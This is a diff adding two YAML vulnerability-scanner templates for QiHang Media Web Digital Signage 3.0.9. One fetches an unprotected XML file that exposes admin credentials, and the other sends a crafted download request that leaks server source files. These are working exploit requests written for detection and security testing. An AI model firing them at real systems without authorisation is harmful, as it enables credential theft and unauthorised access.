diff --git a/vulnerabilities/other/qihang-media-disclosure.yaml b/vulnerabilities/other/qihang-media-disclosure.yaml
new file mode 100644
index 0000000000..4bc2973454
--- /dev/null
+++ b/vulnerabilities/other/qihang-media-disclosure.yaml
@@ -0,0 +1,23 @@
+id: qihang-media-disclosure
+
+info:
+  name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 - Cleartext Credentials Disclosure
+  author: gy741
+  severity: critical
+  description: The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack.
+  reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php
+  tags: qihang,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/xml/User/User.xml"
+
+    matchers:
+      - type: word
+        words:
+          - "<?xml version"
+          - "<Users>"
+          - "account="
+          - "password="
+        condition: and
diff --git a/vulnerabilities/other/qihang-media-lfi.yaml b/vulnerabilities/other/qihang-media-lfi.yaml
new file mode 100644
index 0000000000..a4bcd43d65
--- /dev/null
+++ b/vulnerabilities/other/qihang-media-lfi.yaml
@@ -0,0 +1,35 @@
+id: qihang-media-lfi
+
+info:
+  name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability
+  author: gy741
+  severity: high
+  description: The application suffers from an unauthenticated file disclosure vulnerability when input passed thru the filename parameter when using the download action or thru path parameter when using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources.
+  reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php
+  tags: qihang,lfi
+
+requests:
+  - raw:
+      - |
+        GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "filename=QH.aspx"
+          - "application/zip"
+        part: header
+        condition: and
+
+      - type: word
+        regex:
+          - "QH.aspx.cs"
+          - "QiHang.Media.Web.QH"
+        condition: and
+
+      - type: status
+        status:
+          - 200